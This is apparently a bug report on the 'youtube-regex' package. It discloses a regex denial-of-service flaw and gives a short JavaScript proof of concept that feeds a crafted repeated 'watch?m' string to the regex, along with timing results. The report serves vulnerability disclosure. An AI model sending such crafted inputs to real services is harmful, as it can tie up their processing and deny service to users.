Potential Regex Denial of Service #14
Description
The regex on line 11. in index.js contains a Regex denial of service when large input is provided. It takes longer amount of time to process larger strings because regex will try to backtrack each time it encounters watch?-.
Poc:
var youtubeRegex = require('youtube-regex');
const startTime = performance.now()
let payload = 'youtube.com/' + 'watch?m'.repeat(30000) + '\t'
// contains youtube url address
//youtubeRegex().test('unicorn youtube.com/watch?v=0EWbonj7f18');
youtubeRegex().test(payload);
const endTime = performance.now()
console.log(`Time spent: ${endTime - startTime} milliseconds`)
Time spent: 2346.4928520000003 milliseconds
Compared to a smaller payload:
Time spent: 1124.684798 milliseconds